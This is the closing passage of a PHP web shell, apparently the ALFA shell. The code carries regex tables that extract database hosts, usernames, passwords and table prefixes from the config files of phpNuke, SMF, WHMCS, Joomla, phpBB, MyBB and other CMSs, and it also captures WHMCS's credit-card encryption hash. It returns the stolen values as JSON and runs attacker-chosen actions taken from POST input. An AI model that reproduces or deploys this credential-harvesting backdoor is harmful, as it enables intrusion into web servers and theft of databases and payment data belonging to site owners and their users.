7297'dbuser'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
7298'dbname'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
7299'dbpw'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
7300'prefix'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3)
7301),
7302'phpnuke'=>array('file'=>'/config.php',
7303'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7304'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7305'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7306'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7307'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
7308),
7309'smf'=>array('file'=>'/Settings.php',
7310'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7311'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7312'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7313'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7314'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7315),
7316'whmcs'=>array('file'=>'/configuration.php',
7317'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7318'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7319'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7320'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7321'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7322),
7323'joomla'=>array('file'=>'/configuration.php',
7324'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7325'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7326'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7327'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7328'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7329),
7330'phpbb'=>array('file'=>'/config.php',
7331'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7332'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7333'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7334'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7335'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7336),
7337'mybb'=>array('file'=>'/inc/config.php',
7338'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7339'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7340'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7341'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7342'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7343)
7344);
7345if($cms == "drupal"){
7346 $file = $config[$cms]['file'];
7347 $file=$path.$file;
7348 if(@is_file($file)||_alfa_is_dir($file,"-e")){
7349 }else{
7350 $cms = 'drupal2';
7351 }
7352}
7353if($cms == "vb"){
7354 $file = $config[$cms]['file'];
7355 $file=$path.$file;
7356 if(@is_file($file)||_alfa_is_dir($file,"-e")){
7357 }else{
7358 $path .= '/core';
7359 }
7360}
7361$data = array();
7362$srch_host = $config[$cms]['host'][0];
7363$srch_user = $config[$cms]['dbuser'][0];
7364$srch_name = $config[$cms]['dbname'][0];
7365$srch_pw = $config[$cms]['dbpw'][0];
7366$prefix = $config[$cms]['prefix'][0];
7367$file = $config[$cms]['file'];
7368$chost = $config[$cms]['host'][1];
7369$cuser = $config[$cms]['dbuser'][1];
7370$cname = $config[$cms]['dbname'][1];
7371$cpw = $config[$cms]['dbpw'][1];
7372$cprefix = $config[$cms]['prefix'][1];
7373if(@is_dir($path)||_alfa_is_dir($path)){
7374$file=$path.$file;
7375}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
7376$file=$path;
7377}else{
7378return false;
7379}
7380$file = __read_file($file);
7381if($cms == "drupal2"){
7382 $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
7383}elseif($cms == "vb"){
7384 $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
7385}
7386if(preg_match($srch_host, $file, $mach)){
7387$data['host'] = $mach[$chost];
7388}
7389if(preg_match($srch_user, $file, $mach)){
7390$data['user'] = $mach[$cuser];
7391}
7392if(preg_match($srch_name, $file, $mach)){
7393$data['dbname'] = $mach[$cname];
7394}
7395if(preg_match($srch_pw, $file, $mach)){
7396$data['password'] = $mach[$cpw];
7397}
7398if(isset($prefix)){
7399if(preg_match($prefix, $file, $mach)){
7400$data['prefix'] = $mach[$cprefix];
7401}
7402}
7403if($cms=='whmcs'){
7404if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
7405$data['cc_encryption_hash'] = $mach[3];
7406}
7407}
7408echo json_encode($data);
7409}
7410if(empty($_POST['a']))
7411if(isset($default_action) && function_exists('alfa' . $default_action))
7412$_POST['a'] = $default_action;
7413else
7414$_POST['a'] = 'FilesMan2';//'FilesMan';
7415if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
7416call_user_func('alfa' . $_POST['a']);
7417exit;
7418/*
7419#Persian Gulf For Ever
7420#skype : sole.sad
7421#skype : ehsan.invisible
7422*/
7423?>